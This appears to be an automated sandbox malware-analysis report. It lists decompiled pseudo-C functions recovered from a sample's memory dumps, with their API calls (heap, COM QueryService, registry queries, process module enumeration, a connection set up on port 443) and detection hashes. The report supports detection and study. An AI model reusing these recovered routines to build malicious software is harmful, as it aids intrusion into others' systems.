                              Function 049D447C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 89%
                              			E049D447C(void* __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E049D78A8(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x49dd2b8; // 0xe3a5a8
						_t9 = _t17 + 0x49dea1c; // 0x444f4340
						_t20 = E049D456E( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x49dd270, 0, _a4); // executed
					}
				}
				return _t26;
			}








                              0x049d447f
                              0x049d4485
                              0x049d44dc
                              0x049d448b
                              0x049d4496
                              0x049d449b
                              0x049d449f
                              0x049d44ac
                              0x049d44b4
                              0x049d44c0
                              0x049d44c8
                              0x049d44d2
                              0x049d44d2
                              0x049d449f
                              0x049d44e1

                              APIs
                                • Part of subcall function 049D78A8: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 049D78C0
                                • Part of subcall function 049D456E: lstrlen.KERNEL32(747DF710,?,00000000,?,747DF710), ref: 049D45A2
                                • Part of subcall function 049D456E: StrStrA.SHLWAPI(00000000,?), ref: 049D45AF
                                • Part of subcall function 049D456E: RtlAllocateHeap.NTDLL(00000000,?), ref: 049D45CE
                              • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,049D2EB0), ref: 049D44D2
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Heap$Allocate$Freelstrlen
                              • String ID: Uxt
                              • API String ID: 2220322926-1536154274
                              • Opcode ID: 767e304d03f208d09b093ca1347eae56f62dc1ef715c4be3eea41a458e2d5851
                              • Instruction ID: c0e5aa31314b82924460a89e8a82b727a27180f9921a0807b2b144d6dd76cbd0
                              • Opcode Fuzzy Hash: 767e304d03f208d09b093ca1347eae56f62dc1ef715c4be3eea41a458e2d5851
                              • Instruction Fuzzy Hash: 7F011976200508FFDB12CF54DC40EAA7BE9EB84358F108135FA0996160E771FA95DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D6DFA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E049D6DFA(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x49dd270, 0, _a4); // executed
				return _t2;
			}




                              0x049d6e06
                              0x049d6e0c

                              APIs
                              • RtlFreeHeap.NTDLL(00000000,00000000,049D55CD,00000000,?,?,00000000), ref: 049D6E06
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: FreeHeap
                              • String ID: Uxt
                              • API String ID: 3298025750-1536154274
                              • Opcode ID: 8ca3d3a6911e8cce156996d10ec79b9a7a86eeee42c52f48f54b65d858b435cf
                              • Instruction ID: 10ef4c933ed0b7c71310fa8a7acd0a8c846b3e223e2a7c0088b19f7ea3da842b
                              • Opcode Fuzzy Hash: 8ca3d3a6911e8cce156996d10ec79b9a7a86eeee42c52f48f54b65d858b435cf
                              • Instruction Fuzzy Hash: B6B09275049100AADE114A10DE08B057E21E750700F018021E200000A082354860EA15
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D4176, Relevance: 3.1, APIs: 2, Instructions: 147serviceCOMMON
                              Download Yara Rule
                              C-Code - Quality: 38%
                              			E049D4176(intOrPtr _a4) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr _t76;
				intOrPtr* _t79;
				short _t81;
				char* _t97;
				intOrPtr _t99;
				void* _t105;
				void* _t107;
				intOrPtr _t111;

				_t81 = 0;
				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x49dd2b8; // 0xe3a5a8
				_t4 = _t49 + 0x49de44c; // 0x58189f4
				_t5 = _t49 + 0x49de43c; // 0x9ba05972
				_t51 =  *0x49dd124(_t5, 0, 4, _t4,  &_v20); // executed
				_t105 = _t51;
				if(_t105 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t97 =  &_v48;
					_push(_t97);
					_push(_t97);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x49dd2b8; // 0xe3a5a8
						_t30 = _t56 + 0x49de42c; // 0x58189d4
						_t31 = _t56 + 0x49de45c; // 0x4c96be40
						_t58 =  *0x49dd0f0(_v12, _t31, _t30,  &_v24); // executed
						_t105 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t105 >= 0) {
							_t111 = _v16;
							if(_t111 == 0) {
								_t105 = 0x80004005;
								goto L11;
							} else {
								if(_t111 <= 0) {
									L11:
									if(_t105 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = _v20;
										_v48 = 3;
										_v40 = _t81;
										_t107 = _t107 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
										if(_t105 < 0) {
											goto L7;
										} else {
											_t76 =  *0x49dd2b8; // 0xe3a5a8
											_t23 = _t76 + 0x49de42c; // 0x58189d4
											_t24 = _t76 + 0x49de45c; // 0x4c96be40
											_t105 =  *0x49dd0f0(_v12, _t24, _t23,  &_v24);
											_t79 = _v12;
											 *((intOrPtr*)( *_t79 + 8))(_t79);
											if(_t105 >= 0) {
												L12:
												_t63 = _v24;
												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t105 >= 0) {
													_t99 =  *0x49dd2b8; // 0xe3a5a8
													_t67 = _v28;
													_t40 = _t99 + 0x49de41c; // 0x214e3
													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t81 = _t81 + 1;
									} while (_t81 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t105;
			}

































                              0x049d4181
                              0x049d4183
                              0x049d418a
                              0x049d418b
                              0x049d418c
                              0x049d418d
                              0x049d4193
                              0x049d4198
                              0x049d41a2
                              0x049d41a9
                              0x049d41af
                              0x049d41b3
                              0x049d41b9
                              0x049d41c1
                              0x049d41c2
                              0x049d41c7
                              0x049d41c8
                              0x049d41ca
                              0x049d41cd
                              0x049d41ce
                              0x049d41cf
                              0x049d41d5
                              0x049d426a
                              0x049d426f
                              0x049d4276
                              0x049d4280
                              0x049d4286
                              0x049d4288
                              0x049d428e
                              0x00000000
                              0x049d41db
                              0x049d41db
                              0x049d41e2
                              0x049d41eb
                              0x049d41ef
                              0x049d41f5
                              0x049d41f8
                              0x049d425f
                              0x00000000
                              0x049d41fa
                              0x049d41fa
                              0x049d4291
                              0x049d4293
                              0x00000000
                              0x00000000
                              0x049d4200
                              0x049d4200
                              0x049d4200
                              0x049d4207
                              0x049d420d
                              0x049d4212
                              0x049d421a
                              0x049d421b
                              0x049d421c
                              0x049d421e
                              0x049d4222
                              0x049d4226
                              0x00000000
                              0x049d4228
                              0x049d422c
                              0x049d4231
                              0x049d4238
                              0x049d4248
                              0x049d424a
                              0x049d4250
                              0x049d4255
                              0x049d4295
                              0x049d4295
                              0x049d42a2
                              0x049d42a6
                              0x049d42ab
                              0x049d42b1
                              0x049d42b6
                              0x049d42c0
                              0x049d42c2
                              0x049d42c8
                              0x049d42c8
                              0x049d42cb
                              0x049d42d1
                              0x00000000
                              0x00000000
                              0x00000000
                              0x049d4255
                              0x00000000
                              0x049d4257
                              0x049d4257
                              0x049d4258
                              0x00000000
                              0x049d425d
                              0x049d41fa
                              0x049d41f8
                              0x049d41ef
                              0x049d42d4
                              0x049d42d4
                              0x049d42da
                              0x049d42da
                              0x049d42e3

                              APIs
                              • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,058189D4,049D6FE2,?,?,?,?,?,?,?,?,?,?,?,049D6FE2), ref: 049D4242
                              • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,058189D4,049D6FE2,?,?,?,?,?,?,?,049D6FE2,00000000,00000000,00000000,006D0063), ref: 049D4280
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: QueryServiceUnknown_
                              • String ID:
                              • API String ID: 2042360610-0
                              • Opcode ID: 82bf6b8e2a2afb0fac7c0d5d575c99c3aca1b5293e1d96c75ed43d8a3814d260
                              • Instruction ID: 3e34ea64c698eeb29e94f4a043d045bfbe13ba432dc4491e30abd4725e2d8c83
                              • Opcode Fuzzy Hash: 82bf6b8e2a2afb0fac7c0d5d575c99c3aca1b5293e1d96c75ed43d8a3814d260
                              • Instruction Fuzzy Hash: 0E514175D00519AFDF00DFE8C888DAEB7B9FF88710B058668EA15EB250D771AD45CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D4638, Relevance: 3.1, APIs: 2, Instructions: 123COMMON
                              Download Yara Rule
                              C-Code - Quality: 21%
                              			E049D4638(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				void* _v8;
				char _v12;
				signed int _t34;
				long _t36;
				long _t37;
				signed int _t38;
				void* _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t45;
				void* _t56;
				intOrPtr _t57;
				void* _t63;
				intOrPtr* _t65;
				intOrPtr* _t66;
				void* _t69;

				_t66 = __esi;
				_t63 = E049D65F6(_t34, _a4);
				if(_t63 == 0) {
					L18:
					_t36 = GetLastError();
				} else {
					_t37 = GetVersion();
					_t69 = _t37 - 6;
					if(_t69 > 0 || _t69 == 0 && _t37 > 2) {
						_a4 = 4;
					} else {
						_a4 = 0;
					}
					__imp__(_t63, _a4, 0, 0, 0); // executed
					 *(_t66 + 0x10) = _t37;
					_t38 = E049D6DFA(_t63);
					if( *(_t66 + 0x10) == 0) {
						goto L18;
					} else {
						_t39 = E049D65F6(_t38,  *_t66);
						_v8 = _t39;
						if(_t39 == 0) {
							goto L18;
						} else {
							_t65 = __imp__; // 0x703bf5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
								_t40 = E049D6DFA(_v8);
								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x800100;
									_t56 = E049D65F6(_t40,  *((intOrPtr*)(_t66 + 4)));
									if(_t56 == 0) {
										goto L18;
									} else {
										_t42 =  *0x49dd2b8; // 0xe3a5a8
										_t19 = _t42 + 0x49de758; // 0x450047
										_t43 = _t19;
										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4); // executed
										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
										E049D6DFA(_t56);
										_t45 =  *((intOrPtr*)(_t66 + 0x18));
										if(_t45 == 0) {
											goto L18;
										} else {
											_t57 = 4;
											_v12 = _t57;
											__imp__(_t45, 0x1f,  &_a4,  &_v12);
											if(_t45 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
											}
											_push(_t57);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t66 + 0x18)));
											if( *_t65() == 0) {
												goto L18;
											} else {
												_push(_t57);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t66 + 0x18)));
												if( *_t65() == 0) {
													goto L18;
												} else {
													_t36 = 0;
												}
											}
										}
									}
								}
							} else {
								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
								if(_t39 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t36;
			}




















                              0x049d4638
                              0x049d4647
                              0x049d464d
                              0x049d477c
                              0x049d477c
                              0x049d4653
                              0x049d4653
                              0x049d4659
                              0x049d465b
                              0x049d4669
                              0x049d4664
                              0x049d4664
                              0x049d4664
                              0x049d4677
                              0x049d467e
                              0x049d4681
                              0x049d4689
                              0x00000000
                              0x049d468f
                              0x049d4691
                              0x049d4698
                              0x049d469b
                              0x00000000
                              0x049d46a1
                              0x049d46a4
                              0x049d46aa
                              0x049d46c1
                              0x049d46cd
                              0x049d46d6
                              0x049d46d9
                              0x049d46e1
                              0x00000000
                              0x049d46e7
                              0x049d46ea
                              0x049d46f6
                              0x049d46fc
                              0x00000000
                              0x049d46fe
                              0x049d4701
                              0x049d470a
                              0x049d470a
                              0x049d4714
                              0x049d471b
                              0x049d471e
                              0x049d4723
                              0x049d4728
                              0x00000000
                              0x049d472a
                              0x049d472c
                              0x049d4738
                              0x049d473b
                              0x049d4743
                              0x049d4745
                              0x049d4756
                              0x049d4756
                              0x049d4758
                              0x049d475c
                              0x049d475d
                              0x049d475f
                              0x049d4766
                              0x00000000
                              0x049d4768
                              0x049d4768
                              0x049d476c
                              0x049d476d
                              0x049d476f
                              0x049d4776
                              0x00000000
                              0x049d4778
                              0x049d4778
                              0x049d4778
                              0x049d4776
                              0x049d4766
                              0x049d4728
                              0x049d46fc
                              0x049d46ac
                              0x049d46b7
                              0x049d46bb
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x049d46bb
                              0x049d46aa
                              0x049d469b
                              0x049d4689
                              0x049d4785

                              APIs
                                • Part of subcall function 049D65F6: lstrlen.KERNEL32(?,00000000,05819B78,00000000,049D25B8,05819D56,69B25F44,?,?,?,?,69B25F44,00000005,049DD00C,4D283A53,?), ref: 049D65FD
                                • Part of subcall function 049D65F6: mbstowcs.NTDLL ref: 049D6626
                                • Part of subcall function 049D65F6: memset.NTDLL ref: 049D6638
                              • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,049D572B,747C81D0,00000000,05819618,?,?,049D3B91,?,05819618,0000EA60), ref: 049D4653
                              • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,049D572B,747C81D0,00000000,05819618,?,?,049D3B91,?,05819618,0000EA60), ref: 049D477C
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                              • String ID:
                              • API String ID: 4097109750-0
                              • Opcode ID: 3132dc9cd8241eeab78c70bbc1c71abab1965264591060322988a613617973a1
                              • Instruction ID: 7ae988efe265754291d41e9d7de48038dc91b2efa5cf6aa14151914868913e6a
                              • Opcode Fuzzy Hash: 3132dc9cd8241eeab78c70bbc1c71abab1965264591060322988a613617973a1
                              • Instruction Fuzzy Hash: 62415CB5100204BFEB219FA4CC84EAB7BBDEB88741F408539F64296091E771EA94DF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D5A5E, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                              Download Yara Rule
                              C-Code - Quality: 75%
                              			E049D5A5E(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E049D6A4D(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x49dd2b8; // 0xe3a5a8
						_t20 = _t68 + 0x49de1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E049D4B0E(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                              0x049d5a64
                              0x049d5a67
                              0x049d5a77
                              0x049d5a80
                              0x049d5a84
                              0x049d5b52
                              0x049d5b58
                              0x049d5b58
                              0x049d5a9e
                              0x049d5aa3
                              0x049d5aa7
                              0x049d5aad
                              0x049d5ab2
                              0x049d5ab9
                              0x049d5ac8
                              0x049d5ac8
                              0x049d5acc
                              0x049d5ace
                              0x049d5ada
                              0x049d5ae5
                              0x049d5af0
                              0x049d5af4
                              0x049d5afe
                              0x049d5b02
                              0x049d5b04
                              0x049d5b09
                              0x049d5b10
                              0x049d5b20
                              0x049d5b20
                              0x049d5b09
                              0x049d5b02
                              0x049d5b22
                              0x049d5b27
                              0x049d5b2c
                              0x049d5b2c
                              0x049d5b32
                              0x049d5b38
                              0x049d5b3d
                              0x049d5b3d
                              0x049d5b42
                              0x049d5b47
                              0x049d5b47
                              0x049d5b42
                              0x049d5acc
                              0x049d5b49
                              0x049d5b4f
                              0x00000000

                              APIs
                                • Part of subcall function 049D6A4D: SysAllocString.OLEAUT32(80000002), ref: 049D6AA4
                                • Part of subcall function 049D6A4D: SysFreeString.OLEAUT32(00000000), ref: 049D6B09
                              • SysFreeString.OLEAUT32(?), ref: 049D5B3D
                              • SysFreeString.OLEAUT32(049D4993), ref: 049D5B47
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: String$Free$Alloc
                              • String ID:
                              • API String ID: 986138563-0
                              • Opcode ID: 2f195ec261b766b19f188db9b7f8b7d3099e4b89c9e9763edb3051351706a116
                              • Instruction ID: 1a3f3bcae3ee800acc7068ffb199a3a41d308811e8b2e80db7dd01a1df7e37cb
                              • Opcode Fuzzy Hash: 2f195ec261b766b19f188db9b7f8b7d3099e4b89c9e9763edb3051351706a116
                              • Instruction Fuzzy Hash: 35313772500119FFCB21DFA9D888CABBB79FFC97507158668F8059B210D235ED91CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053CFFB7, Relevance: 3.1, APIs: 2, Instructions: 80registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053D64DE: RegCreateKeyA.ADVAPI32(80000001,064FB7F0,064F8578), ref: 053D64F3
                                • Part of subcall function 053D64DE: lstrlen.KERNEL32(064FB7F0,00000000,00000000,053EF072,?,?,?,053CFFEA,00000001,00000001,064F8578), ref: 053D651C
                              • RegQueryValueExA.KERNEL32(00000001,064F8578,00000000,?,053EF06C,00000000,00000001,00000001,064F8578,053EF072,00000000,?,?,?,064F8578,00000001), ref: 053D000B
                              • RegCloseKey.ADVAPI32(?), ref: 053D0054
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CloseCreateQueryValuelstrlen
                              • String ID:
                              • API String ID: 971780412-0
                              • Opcode ID: 45807c003bb16d5ad94631e8cdd530ce3ffff8b1726336363988167afc14bf6d
                              • Instruction ID: f830efcbab9d71e15ee11ec1df1ca467aa5c8bf03b9c2027b01cc97f70c53190
                              • Opcode Fuzzy Hash: 45807c003bb16d5ad94631e8cdd530ce3ffff8b1726336363988167afc14bf6d
                              • Instruction Fuzzy Hash: AC311A76D10119EFCB22DB95E8499AEBFBDFB04751F11816AF504AA180EBB05E40CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 049D5F72, Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                              Download Yara Rule
                              C-Code - Quality: 50%
                              			E049D5F72(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x49dd2b8; // 0xe3a5a8
				_t2 = _t42 + 0x49de46c; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x49dd2b8; // 0xe3a5a8
					_t6 = _t45 + 0x49de48c; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x49dd2b8; // 0xe3a5a8
							_t30 = _v8;
							_t12 = _t48 + 0x49de47c; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}


















                              0x049d5f7e
                              0x049d5f7f
                              0x049d5f85
                              0x049d5f8c
                              0x049d5f8e
                              0x049d5f92
                              0x049d5f96
                              0x049d5f98
                              0x049d5fa1
                              0x049d5fa7
                              0x049d5faf
                              0x049d5fb1
                              0x049d5fb5
                              0x049d5fb7
                              0x049d5fc4
                              0x049d5fc8
                              0x049d5fcd
                              0x049d5fd3
                              0x049d5fd8
                              0x049d5fe0
                              0x049d5fe2
                              0x049d5fe4
                              0x049d5fea
                              0x049d5fea
                              0x049d5fed
                              0x049d5ff3
                              0x049d5ff3
                              0x049d5ff6
                              0x049d5ffc
                              0x049d5ffc
                              0x049d6003

                              APIs
                              • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 049D5FAF
                              • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 049D5FE0
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp Download File
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Interface_ProxyQueryUnknown_
                              • String ID:
                              • API String ID: 2522245112-0
                              • Opcode ID: 2e27078a07f7d905dd548ab04bf8f9fc6a8a2b3113f07af5984e47527f414670
                              • Instruction ID: 65d4c89745b6c26780d539ff7548e55b789f4c7853d036d343aac4b686d7d7a1
                              • Opcode Fuzzy Hash: 2e27078a07f7d905dd548ab04bf8f9fc6a8a2b3113f07af5984e47527f414670
                              • Instruction Fuzzy Hash: 68213A75A00619AFCB00DFA8C888D9AB779EFC8714B15C698E905DF364D670EE45CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053DCDFE, Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000,?), ref: 053DCE2E
                              • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000), ref: 053DCE75
                                • Part of subcall function 053E69F0: RtlFreeHeap.NTDLL(00000000,?,053C62C2,00000000), ref: 053E69FC
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                              • String ID:
                              • API String ID: 552344955-0
                              • Opcode ID: 4195167e41ae0d941e8e36a72aeb138708bee89521663ba029aa5130be8d05b4
                              • Instruction ID: ee964229822cf56cd87e04f63a36c74e1752dd5f6049a0a539c057ce2971a7f1
                              • Opcode Fuzzy Hash: 4195167e41ae0d941e8e36a72aeb138708bee89521663ba029aa5130be8d05b4
                              • Instruction Fuzzy Hash: BB118AB2A10208ABC721DFA8E848B9EFBFDFF94655F114059E40197140DBB48E05C760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 053D943B, Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,?,00000000,69B25F44,00000000,053C4FAB), ref: 053D9478
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,053C4FAB,?,00000000), ref: 053D94D9
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Time$FileFreeHeapSystem
                              • String ID:
                              • API String ID: 892271797-0
                              • Opcode ID: a694e407e17f1801405969d2daf7ae67218814ae4f1ae1e5f517f1f54b8271cf
                              • Instruction ID: 2ea5e3c9b00ad6e9ca8cb73e43345027fa581325198f45eb8e8aca693ee8f2ba
                              • Opcode Fuzzy Hash: a694e407e17f1801405969d2daf7ae67218814ae4f1ae1e5f517f1f54b8271cf
                              • Instruction Fuzzy Hash: D1110AB6E10208FFCB11DBA4E949BDEBBBCAB08305F1040A6B902E6145DA749B549B60
                              Uniqueness

                              Uniqueness Score: -1.00%
